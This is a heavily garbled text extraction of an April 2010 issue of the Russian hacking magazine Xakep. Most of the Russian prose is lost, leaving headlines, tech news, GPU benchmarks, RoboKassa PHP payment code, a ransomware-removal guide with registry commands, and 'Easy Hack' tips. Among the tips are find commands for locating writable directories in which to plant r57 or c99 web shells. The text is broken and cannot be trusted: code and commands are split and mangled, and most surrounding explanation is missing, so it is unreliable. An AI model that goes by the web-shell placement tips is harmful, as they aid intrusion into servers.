7/22/2019 2010 04(135).pdf
1/148
SHAREWARE-SYMBIAN. 102
:210
.
04 (135) 2 010
DEP
HARDWARE-DEP. 68
ACTIVEX . 58
.NET REMOTING:
GRID-. 96
. 44
LINUX?. 90
7/22/2019 2010 04(135).pdf
2/148
7/22/2019 2010 04(135).pdf
3/148
7/22/2019 2010 04(135).pdf
4/148
X 04 /135/ 10002
CONTENTMegaNews004
Ferrum016 ,
PC_ZONE020
025
ACM ICPC:,
026 ? Visual Studio 2010
030
034 Easy-Hack
038
044 CAPTCHA: ,
050 Unserialize
054 , -
058
ActiveX064 Error-based SQL-Injection
068 DEP hardware-DEP
074 X-Tools
076 2010
080 ,
084
GNU Screen tmux
090 Linux-
096
.NET Remoting:
grid-
099 .NET .NET Framework
102
Shareware-Symbian
106 C#
SYN/ACK110
115 CFEngine 2
120 IN DA FOCUS
122
128 VPN
134 PSYCHO: : -
140 FAQ UNITED FAQ
143 8.5
144 WWW2 web-
7/22/2019 2010 04(135).pdf
5/148
X 04 /135/ 10 003
/> nikitozz ([email protected])> gorl([email protected])> Forb([email protected])
PC_ZONE UNITSstep([email protected])UNIXOID, SYN\ACK PSYCHO Andrushock ([email protected]) Dr. Klouniz([email protected])>([email protected])>xakep.ru ([email protected])
/ART>-([email protected])>([email protected])
/DVD>Step([email protected])
>Unix- Ant>
/PUBLISHING
> , 119021, , ., . 11, . 44-45.: +7 (495) 935-7034
: +7 (495) 780-8824> > > > > >>PR->>>
//.: (495) 935-7034,: (495) 780-8824>GAMES & DIGITAL ([email protected])
>>Gameland TV> ([email protected])>>> ([email protected])>-
/>([email protected])>
/> ([email protected])>
>([email protected]).: (495) 935.70.34: (495) 780.88.24> .: 8 (800) 200.3.999 > 101000, ,, / 652, , 77-11802 14 2002 . Lietuvas Rivas,. 100 000 . . . : . , , . . . .
-:[email protected] , , 2009
026 ?Visual Studio 2010
DEPhardware-DEP
VPN
Linux-
CAPTCHA: , 068044
128 090
7/22/2019 2010 04(135).pdf
6/148
X 04 /135/ 10004
MIFRILL [email protected]
MEGANEWS
MEGANEWS
- ,
, ,
. -
-
Cleankeys Touch Sensitive
Cleankeys Inc. -
, ,
, ,
. Cleankeys Touch Sensitive
, ,
! , -
, ,
. , , ,
, $450
$400 , -.
,
. ,
. ,
.
,-
-
,
.-
:
Virus Total (www.virustotal.
com) 2010
.-
,
.
,,
-
,Virus Total.
,
10
10
14,
.Virus Total
Hispasec Sistemas,
,
,-
-
,
.,
Virus Total,
.,,,,
-
,
.
2 GOOGLE WIKIMEDIAFOUNDATION.
7/22/2019 2010 04(135).pdf
7/148
7/22/2019 2010 04(135).pdf
8/148
X 04 /135/ 10
TWITTER : 1 , 17%.
MEGANEWS
Maemo,
,Nokia
.,-
,Nokia
Intel ,
MeeGo,
,,
.
,
: Moblin (Mobile Linux)Maemo,
.,MeeGo
Symbian,
, , ,
Nokia N900.
Linux
kernel.org,
,.
Qt,
Nokia.,-
MeeGo
.
NOKIA.?
AMAZON KINDLE 3 .
, ,
torrents.ru!
, ,
, -
rutracker.
org, , .
, :
torrents.ru -
-
. 26
-
AutoCAD Autodesk.
,
1,5 .
torrents.ru
, ,
(, )
- -
,
.,
Autodesk, 1, -
,
,
,
. ,
torrents.ru
,
, -
,
.
-
EKinoT.ru, - IT eBay,
Twitter, Cisco Systems, Howcast, Edventure,
Social Gaming Network Mozilla,
.
, , -
, , -
Catalys.
? ? ,
Dreamtorrent (torrents.ru) -
-, -
,
,
-.
,
,
-
.
: .ru -
. torrents.ru:
Cherokee (www.cherokee-project.
com) -, ,
,
HTTP-.
.
THE PIRATE BAY
006
7/22/2019 2010 04(135).pdf
9/148
7/22/2019 2010 04(135).pdf
10/148
,
008
16-,10
-
.-
,?
Cyber ShockWave-
Bipartisan
Policy Center.
,CNN.-
:-
-
,
,-
,-
,
.,-
,-
.
,
,,
-
..
-
,:
:).
MEGANEWS
,,?,
!: ?,
!
Digital Access. 26Digital Accessivi.
ru,9.000
,,-,-
..
?,,,-
,.,-
vs. ivi.ru:
uravo.tv,30-.
Rambler,,
.,,Digital Access
,2011
20%.,
.
X 04 /135/ 10
STRATEGY ANALYTICS , 2016
90% .
,eBay
,,16-
.,
,.,,
,
,.,
eBay,
-PayPal,,,
,.
, .,
- (,-)
,,:.
,:,,! eBay,,
,
.-
.
: 44- .
, ,
7/22/2019 2010 04(135).pdf
11/148
009
7/22/2019 2010 04(135).pdf
12/148
X 04 /135/ 10
, The Pirate Bay,-
Flattr .,
,,,
,
,,.:
Flattr,,$10.-
,,,-Flattr-.
,Flattr-,
.,.,
,,
,.,-
Flattr-,,,
.,10,
$1,100 $0,1.,.
.
USB 3.0SATA 6/
,
,
,.,
,
?
GA-USB3.0Gigabite.
PCI-Express x1
USB 3.0.-GA-USB3.0
Molex,
.
$40.
USB 3.0
MEGANEWS
NVIDIA: ,-
.NVIDIA Optimus-
-
,
. NVIDIA
, -
., NVIDIAOptimus,, ,
ASUS UL50Vf, N61Jv, N71Jv, N82Jv U30Jc.
NVIDIA OPTIMUS
010
, 24 -.
7/22/2019 2010 04(135).pdf
13/148
11
7/22/2019 2010 04(135).pdf
14/148
012
RADEON HD 5830AMD 3D
ATI Radeon HD 5830,
,
Gigabyte, Sapphire,
XFX.,
AMD. ATI Radeon HD
5830
57705850.-
ATI Radeon HD
5800 $240.
:
40-Cypress
1120,
56 1GDDR5.
8004000
.-
ATI Radeon HD 5830
DirectX 11, ATI Eyefinity, CrossFireXATI Stream.
,
,
Radeon HD 5830 -
.
MEGANEWS
--
,
Globalscale GuruPlug Server..99
,
ARM: Marvell KirkWoord 1.2, 512 DDR2 800,
802.11g, Bluetooth-,
Ethernet, 2 USB2.0,.
ARM-Debian
2.6.32,,, -.Ethernet-
eSATA,
PLUS 30.www.
globalscaletechnologies.com,,
shipito.com,
.,,
:5
175.
,
X 04 /135/ 10
-
Black Hawk Safety Net
(3800hk.com),.,
,,-,12000
.12000 VIP-
650000.
,-
,.,,
.
WIMAX FORUM, WIMAX
620 ., 2011 1.
7/22/2019 2010 04(135).pdf
15/148
X 04 /135/ 10 13013
Chrome -
$1337,
Pwn2Own, -
security--
CanSecWest -
, .
4-,
$100000.-
$40000,
-
(Microsoft Internet Explorer,
Mozilla Firefox, Google Chrome,
Apple Safari),
(XP Vista, Windows
7, Mac OS X Snow Leopard).
-
-
.
Apple iPhone
3GS, RIM Blackberry Bold 9700,
Nokia Symbian
S60 (, E62),
Motorola
Google Android.
.
,
Safari, Firefox
Internet Explorer 8,
(
Nils ),
-
. ?
PWN2OWN 2010
500000! : 3-.
7/22/2019 2010 04(135).pdf
16/148
X 04 /135/ 10
-,
,.
: -, -
,,
.Symantec ,-
,
.-
-
Live PC Care
!,,,
.
,
,
($30100).
.
MEGANEWS
pleaserobme.com(-
,
)
.
,
-
,
.
:
-
Twitter.,
-
,
.
,
.
, ,
19-
1710-17851805-1885
GSM.
,,
.,-
,.
,-
.
,Delta, Air France, Lufthansa, Emirates.
15
LTE (Long Term
Evolution) .-
CDMA/UMTS
326,4/,172,8/.
: WiMax vs. LTE,
,.
LTE2009-
.
GSM ,4G
SCANSAFE , 2009 80% PDF-.
014
7/22/2019 2010 04(135).pdf
17/148
X 04 /135/ 10 015
- PlayStation 3 , - . Y2k, ? , PS3. - 28 1 2010 PlayStation 3( Slim- ), - , ( ) - PlayStationNetwork. PSN : An errorhas occurred. You have been signed out of PlayStationNetwork (8001050F) , Failed to installtrophies. Please exit your game. 1 2000 (-
). Sony -, 24, . ,
2010 , . , 29 1 .
Y2K , 10
Zeus
-
. SpyEye 2009,
. Zeus,
.
-,
(C&C).
, (1.0.7)-
Kill Zeus. SpyEye
Windows API
HttpSendRequestA,
Zeus.,
SpyEye,
Zeus,,ZeusC&C-
(,
),,-
.
Zeus.
7/22/2019 2010 04(135).pdf
18/148
SapphireRadeon HD 4650
SapphireRadeon HD
4670pphireeon HD
4650
PalitGeForce
GT220Sonic
phireHD 5750
a e orceGT 220
SapphireRadeon HD 5750
PalitGeForce GT240 Sonic
FERRUM
,,?-
,
.
,.
NVIDIAATI,
,,low-end.
.ATI,
NVIDIACUDAPhysX,,
.,ATI Stream,
CUDA.,,ATI(,
)..NVIDIA512,
ATI256-.,
GDDR5,
.
.NVIDIA55--
,ATI40.,NVIDIA
40.
,,-
.,
.,
,.-
3DMark 2003,Red Faction: Guerrilla, Resident Evil 5Batman: Arkham Asylum.
,-
,
16801050,,
.Red Faction: Guerrilla-
12801024,.,
,
,.
016
.
.
, .
PALIT GEFORCE GT 220PALIT GEFORCE GT 220 SONICPALIT GEFORCE GT 240 SONICSAPPHIRE RADEON HD 4650SAPPHIRE RADEON HD 4670 ULTIMATESAPPHIRE RADEON HD 5750
:
,
PalitGeForceGT220Sonic
BATMAN: ARKHAM ASYLUM, FPS
Sapphire Radeon HD 4650
Sapphire Radeon HD 5750
Palit GeForce GT 220
Palit GeForce GT 220 Sonic
Palit GeForce GT 240 Sonic
NVIDIA-
Sapphire Radeon HD 4670
0 10 20 30 40 50 60 70 80
X 04 /135/ 10
7/22/2019 2010 04(135).pdf
19/148
SapphireRadeon HD 5750
PalitGeForcGT220Sonic
SapphireRadeon HD 5750
PalitGeForceGT220Sonic
Palit
GeForce GT240 Sonic
017
NVIDIA GeForce GT 220. -
,
,
, , PCI-E.,
DVIHDMIVGA,,
,,.-
Palit10-
.,,.
, 51 ..
DDR2, ,,
. .
,-
.
Sonic .,
Palit GeForce GT 220.-,
GDDR3,
,.
-, 10650900
, (, 625
790).,
, Palit
.,, 128--
1-,
.-
VGA, HDMIDVI.,
.
.
,
.
X 04 /135/ 10
:,: 40,: 650
,: 900
: GDDR3
,: 512
,: 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
PALIT GEFORCEGT 220 SONIC
PalitGeForceGT220Sonic
PALIT GEFORCEGT 220
1800 .
:,: 40
,: 635
,: 800
: DDR2
,: 512
,: 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
Sapphire Radeon HD 4650
Sapphire Radeon HD 5750
Palit GeForce GT 220
Palit GeForce GT 220 Sonic
Palit GeForce GT 240 Sonic
Sapphire Radeon HD 4670
GPU,
,
0 50 100
2000 .
7/22/2019 2010 04(135).pdf
20/148
FERRUM
X 04 /135/ 10018
:,:,: 55,:,: 600,:,: 700:: GDDR3,:,: 512,:,: 128:: PCI EXPRESS 2.0DIRECTX:DIRECTX: 10.1
:,: 40
,: 585
,: 945
: GDDR5
,: 1024
,: 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
SAPPHIRE RADEON
HD 4650
PALIT GEFORCE
GT 240 Sonic
NVIDIA
.-
,GDDR5,
.Sonic-
(95)(35),-
.,
ATI Radeon Sapphire Radeon HD 5750.
,
,
.
-
, ,
, ,
-.
,,
,, .
low-end,
.,,,
Sapphire Radeon HD 4650-
.HDMI, VGA
DVI, -
.-
.
, .,,
Red Faction: Guerrilla.
.,,
, , -
.
3500 .
1700 .
\
Sapphire Radeon HD 4650
Sapphire Radeon HD 5750
Palit GeForce GT 220
Palit GeForce GT 220 Sonic
Palit GeForce GT 240 Sonic
Sapphire Radeon HD 4670
-Batman: Arkham, Asylum, FPS/..
-Resident Evil5, FPS/..
-Red Faction: Guema, FPS/..
0.00000 5.00000 10.00000 15.00000 20.00000 25.00000
RESIDENT EVIL 5, FPS
Sapphire Radeon HD 4650
Sapphire Radeon HD 5750
Palit GeForce GT 220
Palit GeForce GT 220 Sonic
Palit GeForce GT 240 Sonic
.
Sapphire Radeon HD 4670
0 10 20 30 40 50 60 70 80
7/22/2019 2010 04(135).pdf
21/148
019X 04 /135/ 10
:,: 40
,: 700
,: 1150
: GDDR-5,: 1024
,: 128
: PCI EXPRESS 2.0
DIRECTX: 11
:,: 55
,: 750
,: 873
: GDDR3,: 512
,: 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
SAPPHIRE RADEONHD 4670 Ultimate
SAPPHIRE RADEONHD 5750
, ,
-
. , , .
Sapphire Radeon
HD 5750,
, -.
Palit GeForce GT 220 Sonic
..z
5700 .
,
.--
,, Sapphire
Radeon HD 4670 Ultimate, ,
.,,
..
,,
.
, (-
).,-
,,-
.
.
, ,
,
DirectX 11.,,
,, .,
,-
.,
.
,, ,
.,
.
3100 .
RED FACTION: GUERRILLA, FPS
Sapphire Radeon HD 4650
Sapphire Radeon HD 5750
Palit GeForce GT 220
Palit GeForce GT 220 Sonic
Palit GeForce GT 240 Sonic
Sapphire Radeon HD
5750
Sapphire Radeon HD 4670
0 5 10 15 20 25 30
3DMARK 2003,
Sapphire Radeon HD 4650
Sapphire Radeon HD 5750
Palit GeForce GT 220
Palit GeForce GT 220 Sonic
Palit GeForce GT 240 Sonic
.
,
Sapphire Radeon HD
5750
.
Sapphire Radeon HD 4670
0 10000 20000 30000 40000 50000
7/22/2019 2010 04(135).pdf
22/148
PC_ZONE
020
PC_ZONE
,
Webmoney. -
, ,
: -
,
. ,
. , ,
,
.
,
.
, -,
. , -
, ,
, -
. :
, -
.
,
? , -
.
( PDF-), , -
SMS.
Robokassa'
(www.robokassa.ru), -
-
. ,
,
-,
, ,
-,
.
-
,
.
(.,Webmoney )? !
-
SMS? .
.
,
? , 9 -
. .
, -
5% .
, .
,
! , , -
, PHP (+ curl)
jQuery,
.
ROBOKASSA-,
PHP,
.
RoboKassa
API-.
,
. -
, :
PHP, Perl , ,
ASP Python .
HTTP- GET
POST URLhttps://merchant.
roboxchange.com.
-
. -
RoboKassa -
:
1. - URL RoboKassa,
,
.
2.RoboKassa , .
. -, -
, RoboKassa,
X 04 /135/ 10
! , !
, . -,
? -
?
? .
gurza [email protected]
7/22/2019 2010 04(135).pdf
23/148
X 04 /135/ 10 021
, ,
.
3. RoboKassa Result-.
, -
URL- Fail (
,
-
),
Success (
). URL- Result--
Success, Fail -
RoboKassa
.
:
1. URL-,
-
:
//
$inv_id = 0;
//
$shp_item = $item;$shp_user = 'TestUser';
//
$crc = md5("$mrh_login:$out_
summ:$inv_id:$mrh_pass1:Shp_
item=$shp_item:Shp_user=$shp_
user");
// URL
$url = "https://merchant.
roboxchange.com/Index.
aspx?MrchLogin=$mrh_
login&OutSum=$out_summ&InvId=$inv_
id&Desc=$inv_desc&Shp_
item=$shp_item&Shp_user=$shp_
user&SignatureValue=$crc";
,
GET.
MrchLogin
RoboKassa. -
demo.
OutSum /.
InvId .-
,
.
,
(
RoboKassa), -
.
Desc -
/,
, ,
URL.
Shp_item, Shp_
user -
:
Shp_item .Shp_user (, -
).
,
(InvId), RoboKassa
, ,
, -
/.
,
, SignatureValue
, -
- md5 "$mrh_
login:$out_summ:$inv_id:$mrh_pass1:Shp_
item=$shp_item:Shp_user=$shp_user".
-
,
$mrh_pass1 .
, RoboKassa. ,
-
-
.
2. -, ,
URL.
-
.
3., -
-
Result-, -
: -,
, -,
(
) ,
. -
,
Bad sign, OK.
Result-.
//
$out_summ = $_REQUEST["OutSum"];
$inv_id = $_REQUEST["InvId"];
$shp_item = $_REQUEST["Shp_item"];
$shp_user = $_REQUEST["Shp_user"];
$crc = $_REQUEST["SignatureValue"];
$crc = strtoupper($crc);
//
$my_crc = strtoupper(md5("$out_
summ:$inv_id:$mrh_pass2:Shp_
item=$shp_item:Shp_user=$shp_
user"));
,
Result-, -
-.
-
, , ,
.
,
API- RoboKassa, -
-: bidiko.ru/test/xa/payments.php?item=1
ajax- XML
7/22/2019 2010 04(135).pdf
24/148
PC_ZONE
. -
.
, -
-
.
1. -, -
(
, ,
..). ,
.
,
.
2.
.
,
,
.
.
,
, ajax-,
(,
) , -
.
curl:
,
.
payments.php.
$item
/ (),
GET. payments.php
, (-
)
. -
payments.php.
// -
//"" /
// -
payments.php (
)
,
switch.
,
,
, -
.
,
,
.
.
: ,
(,),
-
.
pay_table.
: ,
:
:
.
PayCode -
.
, . PCR.
,
URL ( $url)
.
,
,
$url .
7/22/2019 2010 04(135).pdf
25/148
X 04 /135/ 10
OUTCURR
LOGIN
CNT
OUTCURR
(
RoboKassa), LOGIN
, CNT
.
XML- RoboKassa -
nRetCode
sOutCurrLabel
nOutCount
sDateODBC120
sIncCurrLabel
sIncCurrName
nValuet
nInCount
: nRetCode , 0 -
, (
.
RoboKassa www.robokassa.ru/Doc/Ru/
Interface.aspx);
sOutCurrLabel
;
nOutCount
;
sDateODBC120 , - ( "yyyy-mm-dd
hh:mm:ss", GMT);
, -
,
RoboKassa.
in_curr ,
payments.php PayCode;
ins_per_Xout, ,
, ,
,
.
, -
XML- RoboKassa,
jQuery ( rk_xml_int.js).
ajax().
function getXML(url, cnt){
$.ajax({
url: url,
type: 'POST',
dataType: 'xml',
data: {cnt: cnt},
beforeSend: xmlStart,
success: xmlSuccess,
error: xmlError,
complete: xmlComplete
});
}
getXML() .
url
URL-,
. cnt . ,
ajax(),
, xmlStart, xmlSuccess, xmlError,
xmlComplete, . -
. ,
url -
,
.
PHP- XMLHTTPREQUEST
ajax() jQuery -
API-
XMLHttpRequest.
XMLHttpRequest HTTP-, .
XSS-, XMLHttpRequest
.
, script.js,
serv1.com,
serv2.com
XMLHttpRequest.
- rk_rate_proxy.php.
: rk_xml_
int.js XMLHttpRequest
XML- rk_rate_proxy.php (
),
curl XML-
RoboKassa,
. .
XML- curl
:
curl_setopt($ch, CURLOPT_URL,
$url);
curl_setopt($ch, CURLOPT_
RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT,
20);
curl_setopt($ch, CURLOPT_
POSTFIELDS, $request);
curl_setopt($ch, CURLOPT_
HTTPHEADER, array('Connection:
close'));
$url XML-
RoboKassa,
rk_rate_proxy.php. $request , , XML-,
:
$request = '';
$request .= 'RUR';
$request .= 'demo';
$request .= ''.$cnt.'';
$request .= '';
demo. curl ,
. ,
RK
,
023
7/22/2019 2010 04(135).pdf
26/148
PC_ZONE
X 04 /135/ 10
$result = curl_exec($ch);
header('Content-type: text/xml');
echo $result;
, PHP- rk_rate_proxy.php .
.
Ajax-,XMLHttpRequest ,
. ,
ajax().
. xmlStart()
XML-.
CSS- div id=xmlConsole.
ajaxLoaderCSS
. -
-www.ajaxload.info ,
. xmlStart()
.
function xmlStart(xhrInstance) {
$("#xmlConsole").
addClass("ajaxLoaderCSS");
}
xmlError(),-
, XML-
.
div-""
.
function xmlError(xhrInstance, message,
optional) {
$("#xmlConsole").html('
!
');
$("#pay_systems").css(
'display', 'none');
}
XML-
xmlComplete(),
id=xmlConsole CSS- ajaxLoaderCSS,
xmlSuccess(),
parseXML() XML-.
parseXML()
jQuery -
JavaScript, .
function parseXML(xml){
//
$( xml ).find('rate').each(function(){
//
var curr =$(this).find('in_curr').text();
//
var val = $(this).find('ins_per_Xout').
text();
// -
$('#'+curr).html(val);
});
}
. -
XML-,
payments.php
$(function() {
7/22/2019 2010 04(135).pdf
27/148
025
STEP T WI T T ER .CO M/S T EPAH
ACM ICPC: c - ACM ICPC: c -, ,, , ,,
ACM-ICPC,
IBM, -
. ,
, : ,
. IBM:
, , . ?!
--
, -
. -
,
, .
, -
30
. ACM-
ICPC
.
: -
,
, .
-
(, ,
)
. ,
- IBM
, . -
: !
, , .
103
.
(, ), -
- .
20 .
, , ACM ICPC ,
.
,
, ,
. 11
. 18
. -
, ,
. ?
: . !
-
. , -
, , 5 , 11
.
,
, -
.
, , ,
,
-
IBM Smarter Planet ()
, , -
,
-
,
-
,
. -
,
,
,
-
.
. -
, -
, ,
,
.
-
C, C++ Java .
-
,
,
.
, -
. -
,
,
,
, .
? , -
.
30
,
.
,
. . , -
: , ?
? ,
three, two, one . ,
-
. -
,
.
: ACM-ICPC
, .
-
: -
, () - ().
-
. , ,
. z
X 04 /135/ 10
ACM ICPC ACM ICPC
7/22/2019 2010 04(135).pdf
28/148
PC_ZONE
026
PC_ZONE
,
,
, Visual Studio
2010
12 2010.
:).
-
2009 . ,
,
., -
, -
.
?
-
! -
,
.
,
.
UI-
(IDE IntegratedDevelopment Environment) ,
, -
. :
Windows Presentation Foundation (WPF).
,
. ,
,
, .
.
, -
VS
, -
IDE
:). , , MS
-
.
,
.
,
,
.
,
WPF,
.
, -
,
-
,
.
.
Visual Studio 2010 -
:
.
:
-
,
.
,
.
-
, ,
Visual Studio
, 2010
. ,
Call Hierarchy (-
)
("-
?", "
") , . -
Find All References.
, -
X 04 /135/ 10
VISUAL STUDIO 97 . MICROSOFT -
,
. VISUAL STUDIO 2010.
MICROSOFT ,
.
? Visual Studio 2010
7/22/2019 2010 04(135).pdf
29/148
X 04 /135/ 10 027
, .
,
,
,
.
. Visual Studio 2010
, -
,
.
, Navigate
To (,
CTRL+)
level-up
,
. ,
-
.
, ,
, -
.
-
,
.
, -
.
-
-
. :
-
, (private). ,
-
, , -
, -
. , -
SHIFT+ALT ()
,
, ,
.
.
, ,
\\.
-
(-
code snippets) HTML
JavaScript.
,, -
-
. Visual Studio 2010
.
-
.
. -
-
Watch:
, . -
,
,
,
. -
-
.
-
, , ,
.
, -
.
-
IntelliTrace,
.
: -
.
: -
, , -
, : ,
,
, !
: -
,
, -
. , -
,
,
,
,
, , , .
, -
.
-
? -
:
. ,
.NET Framework 4,
Visual Studio 2010,,
.
.
IDEVisual Studio 2010
Call Hierarchy
7/22/2019 2010 04(135).pdf
30/148
PC_ZONE
Visual Studio 2010 -
: -
(Parallel Stacks)
(Parallel Tasks).
, -
. -
,
,
, -
:
.
-
: -
,
.
,
,
.
-
, -
, ,
(deadlock).
-
:
, (),
-
.
, ,
.
-
,
Visual Studio
2010 -
.
,
:
-
(ConcurrencyProfiling),
,
.
-
, , -
. -
Tier Interaction Profiler.
-
,
. -
-,
, -
. ,
ASP.NET -
JavaScript -
Internet
Explorer 8.-
,
,
, ,
.
, -
,
,
-. ,
,
-
.
028
.NET FRAMEWORK 4
VisualStudio 2010 .NETFramework 4, -
. -
, ,: -
-
. : BigInteger Complex.
. ,
-
,
.
.NET Framework Managed Extensibility Framework (MEF) -
().
, - . -
, MEF.
-
Visual Studio 2010. , .NET Framework4
-.
System.Threading. , WPF:DataGrid, Calendar DataPicker, -
-,
-
.
X 04 /135/ 10
7/22/2019 2010 04(135).pdf
31/148
7/22/2019 2010 04(135).pdf
32/148
PC_ZONE
030
PC_ZONE
X 04 /135/ 10
! xakep 31337. SMS, ,
, , Microsoft -
, , , , -. .
Step twiter.com/stepah
Trojan.Winlock -
,
-
,-
,
.
(Ransomware ransom,
),,-
SMS.,-
:
,
Microsoft
,
,, -
,
SMS.
?
(-
, , ,
),
, ,
, , -
.
,
,
,
SMS . -
. -
,
,
, -
. , -
, ,
, .
, -
, , .
TDL3,
. ,
--
(, ,
). ,
,
().
,
, , ,
, -
, .
,
, ?
-
, -
.
-,
.
, -
.
1. , -
,
.
- ,
,
.
7/22/2019 2010 04(135).pdf
33/148
X 04 /135/ 10 031
Dr.Web
wmic
(WMI Command-line), -
,
:
wmic /NODE: ( /
NODE:192.168.1.12) /USER:
(, /USER:yastep)
-
,
. -
-
process. -
,
.
:
delete:
process where name="" delete
, -
, .
2. Windows XP/2000,
-
,
-. -
-,
,
.
3.,
,
.
LiveCD.
,
,
ERD Commander.
,
: 5.0 Windows XP, 6.0 Windows
Vista, 6.5 Windows 7/Server 2008 R2.
-
,
.
rescue-
LiveCD -
,
: Dr.Web LiveCD
(www.freedrweb.com/livecd ) Kaspersky
Rescue Disk (devbuilds.kaspersky-labs.com/
devbuilds/RescueDisk).
4.,
,
. ,
, ,
-
,
, ,
, .
,
,
, , ,
.
, -
. ,
,
,
, -
,
SMS -
.
:
:
support.kaspersky.ru/viruses/deblocker;
Dr.Web:
http://www.drweb.com/unlocker/index; Eset: www.esetnod32.ru/.support/winlock.
RansomHide (http://softget.
net/freeware/projects/RansomHide/ransomhide.
exe). SMS
,
. ,
-,
.
, , -
. ,
(
,
, Hijackthis, Autoruns OSAM).
,
, .
HKLM\SOFTWARE\
Microsoft\Windows NT\CurrentVersion\Winlogon\
userinit, , -
Winlogon ,
. , Winlogon
Userinit.exe,
logon-,
,
Explorer.exe, ..
Windows. Userinit.exe
-,
, Windows
Explorer, , ,
-
.
,
:
Userinit = %systemfolder%\
userinet.exe, [ -
]
-
. , -
tmp,
Windows.
, -
%systemfolder%\userinit.exe.
- shell (-
, userinit), explorer.exe
.
,
,
. , -
, .
-
NTFS? .
streams (technet.microsoft.
com/en-us/sysinternals/bb897440.aspx)
, : "streams.exe
-d -s c:\".
, -
7/22/2019 2010 04(135).pdf
34/148
PC_ZONE
(
,
), -
,
-
(-
):
Kaspersky Virus Removal Tool (avptool.
virusinfo.info) -
, -
,
-
. ,
.
,
-
.
Dr.Web CureIt! (www.freedrweb.com/cureit )
,
,
.
,
.
,
,
, -
,
-:
AVZ (www.z-oleg.com/secur/avz ) -
, -
,
, -
.
--
. AVZ
,
,
,
. -
,
API-.
HijackThis (free.antivirus.com/hijackthis)
, AVZ, ,
, -
-
.
-
,
.
security-,
,
-
virusinfo.info.
, AVZ/HijackThis,
-, -
AVZ.
, -
AVZ
-> -
/-
! virusinfo.info
!
virusinfo.info. -
, , -
DLL-,
Internet Explorer -
, .
HTML,
,
,
.
-
,
,
-
, , -
,
. ,
.
HKEY_CURRENT_
USER,
, HKEY_LOCAL_
MACHINE,
.
, -
. -
, DisableRegedit DisableRegistryTools:
Hijackthis
X 04 /135/ 10
AVZ LiveCD Dr.Web
80 ERDCommander
032
7/22/2019 2010 04(135).pdf
35/148
X 04 /135/ 10
reg add HKLM\Software\Microsoft\Windows\
CurrentVersion\Policies\System /v
DisableRegedit /t REG_DWORD /d 0
reg add HKCU\Software\Microsoft\Windows\
CurrentVersion\Policies\System /v
DisableRegedit /t REG_DWORD /d 0
reg add HKCU\Software\Microsoft\Windows\
CurrentVersion\Policies\System /v
DisableRegistryTools /t REG_DWORD /d 0
.
exe-,
reg-:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\exefile\shell]
[HKEY_CLASSES_ROOT\exefile\shell\open]
"EditFlags"=hex:00,00,00,00[HKEY_CLASSES_ROOT\exefile\shell\open\
command]
@="\"%1\ %*"
[HKEY_CLASSES_ROOT\exefile\shell\runas]
[HKEY_CLASSES_ROOT\exefile\shell\runas\
command]
@="\"%1\ %*"
,
.
(,
regedit.exe) HKLM\SOFTWARE\
Microsoft\Windows NT\CurrentVersion\Image File Execution
Options. ,
,
Debugger.
, -
.
:
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\
Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\regedit.exe"
, -
,
HKEY_LOCAL_MACHINE\SOFTWARE\
Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths.
, , -
.
,
DisableTaskMgr. reg-:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:0
,
, -
. popup
SMS . ,
-
,
Internex Explore
Firefox'. ,
, -
. Internet Explorer >
> ,
Firefox'
> .z
033
-
-
ProcessExplorer
,
.
exe-
-
,
-,
-
.
info
INFO
SMS-,
SMS ?
SMS .
, . Google' sms , . ,
, , -, Google -
, ., , .
, .
, : , , -
. ., , , SMS , ,
(), . , , , , -
.
, . -, . , : SMS
, SMS
.
7/22/2019 2010 04(135).pdf
36/148
Cr@wler [email protected]
Spyder spyder@ant ichat .net
Easy Hack
034
: OPENVPN
:
OpenVPN
,., ,
whoami root,: :) ?.
VPN-.
1. tun: modprobe tap && lsmod |
grep tap
2., OpenVPN.
C lzo,
:locate lzo.so
3., ,
.-,
. (
, )
linux.
tar xzvf lzo.tgz
cd lzo
./configure
make
make install
4., lzo , openvpn
lzo:
tar xzvf vpn.tgz
cd vbb
./configure
make
make install
5..
. /etc/openvpn/,
openvpn easy-rsa sample-config-files
/etc/openvpn/easy-rsa :
./vars ( )
./clean-all ( keys )
./build-ca ( )
./build-key-server server ( X.509 -
)
X 04 /135/ 10
: -SQL-INJECTION
:,,
,-
., ,
,
.
7/22/2019 2010 04(135).pdf
37/148
./build-key-pkcs12 client ( X.509 -
)
Common name
. client, server.
6.,
./build-dh
7., -
.
touch /etc/openvpn/server.conf
port 443
proto tcp
dev tap
cipher DES-EDE3-CBC
reneg-sec 60
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/server.crt
key /etc/openvpn/easy-rsa/keys/server.key
dh /etc/openvpn/easy-rsa/keys/dh2048.pem
server 10.10.200.0 255.255.255.0
client-config-dir ccd
push "dhcp-option DNS 222.222.222.222"
push "dhcp-option DNS 22.22.222.222"
push "redirect-gateway"
keepalive 10 120
persist-key
persist-tun
comp-lzo
verb 0
8. ip- iptables:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 10.10.200.0/24 -j SNAT --to
127.0.0.1
127.0.0.1 ip , VPN
9. vpn/sample-scriptsopenvpn.init -
- (, init) /etc/init.d/
:
/etc/init.d/init start
10., .
, :).-
OpenVPN -
, ,
.
:PHP-
:
2004SecurityLab,-php-
php://input.,.
, ,:
phpinfo().
2.PHP-.
7/22/2019 2010 04(135).pdf
38/148
036 X 04 /135/ 10
: -
::
,r57, c99.
find . -perm -2 -type -d -ls
.
,
, , .
, -
.
find . -user www -type d -ls , www
find . -user www -perm /222 -type d -ls ,
find . -group www -type d -ls ,
www
find . -perm -a+w -type d -ls ,
(, dr-xr-xrwx)
find . -perm -2
-type -d -ls,drwxrwxrwx ,
rwx
:,-
:,,?
/tmp.
.
1.phpinfo().session.save_handler.-files,,
session.save_path. -
Local Value,
(), .htaccess.
Master Value ,,
php.ini.
2. .htaccess,php_value
session.save_path.
3..
,.
/tmp/
/php_sess//tmp/phpsess/
/tmp/php/
/tmp/php-sess/
/home/%username%/tmp/
5
6
